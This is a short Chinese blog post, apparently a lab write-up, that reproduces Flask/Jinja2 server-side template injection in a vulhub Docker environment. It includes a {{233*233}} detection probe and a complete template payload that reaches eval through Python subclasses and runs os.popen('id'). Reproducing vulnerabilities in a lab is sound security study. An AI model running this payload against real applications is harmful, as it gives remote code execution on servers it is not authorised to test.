flask-ssti 漏洞复现

水下月 2021-02-20
Web安全 发布于 2021-02-20 15:14:59 阅读 79 评论 0

一 服务端模板注入漏洞

服务器模板注入 (SSTI) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI 攻击可以用来找出 Web 应用程序的内容结构。

二、利用搭的 vulhub 靶机漏洞复现

1,在自己主机上安装 vulhub, 然后进入 flask 里的 ssti
docker-compose up -d 开启漏洞环境
2,然后在浏览器上访问ip:8000
.

3,访问 [http://your-ip/?name={{233*233}}
得到 54289,说明 SSTI 漏洞存在。
.

4,获取 eval 函数并执行任意 python 代码的 POC: // 获取 os

   {% for c in [].__class__.__base__.__subclasses__() %}
     {% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

5、最后放到浏览器里注意要 url 编码,得到执行结果。
.

漏洞 eval
本作品采用《CC 协议》,转载必须注明作者和本文链接
水下月
36 声望
暂无个人描述~
讨论数量: 0
排序:
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
支持 MD 帮助
水下月
未填写
  • 作者发布文章15
  • 作者收获粉丝0
  • 作者收到点赞5
  • 所有文章被收藏了0
  • 博客总访问量排行第11
  • 博客总访问量2943(每日更新)
文章归档
7 2021 年 2 月
6 2021 年 1 月
2 2020 年 11 月
查看所有博文
最新 最受欢迎
Nginx 越界读取缓存漏洞复现(CVE-2017-7529) [3天前]
nginx 文件名逻辑漏洞复现(CVE-2013-4547) [3天前]
MySQL 身份认证绕过漏洞(CVE-2012-2122)复现 [5天前]
flask-ssti 漏洞复现 [1周前]
Shellshock 破壳漏洞 CVE-2014-6271 复现 [1周前]
Jenkins 远程代码执行漏洞 CVE-2017-1000353 复现 1
cve-2017-12149 JBOOS 反序列化漏洞复现 1
CVE-2014-0160 心脏滴血漏洞复现 1
身份认证绕过漏洞复现 CVE-2012-2122 1
CVE-2019-11043 远程代码执行漏洞复现 1
© 2021 WANGAN.COM 帮助网安从业者成长;关注产业发展,做网络安全忠诚卫士!